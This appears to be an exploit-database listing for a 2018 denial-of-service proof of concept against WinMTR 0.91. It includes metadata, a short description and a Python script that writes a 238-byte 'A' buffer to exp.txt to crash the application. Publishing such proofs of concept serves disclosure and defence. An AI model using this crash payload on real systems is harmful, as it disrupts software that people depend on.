header-logo
Suggest Exploit
vendor:
WinMTR
by:
Ihsan Sencan
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: WinMTR
Affected Version From: 0.91
Affected Version To: 0.91
Patch Exists: YES
Related CWE: N/A
CPE: winmtr.net
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

WinMTR 0.91 – Denial of Service (PoC)

WinMTR 0.91 is vulnerable to a Denial of Service attack when a maliciously crafted exp.txt file is opened. When the file is opened, the application crashes.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

# Exploit Title: WinMTR 0.91 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://winmtr.net
# Software Link: http://winmtr.net/winmtr_download/
# Version: 0.91
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Host: Payload

#!/usr/bin/python
    
buffer = "A" * 238
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."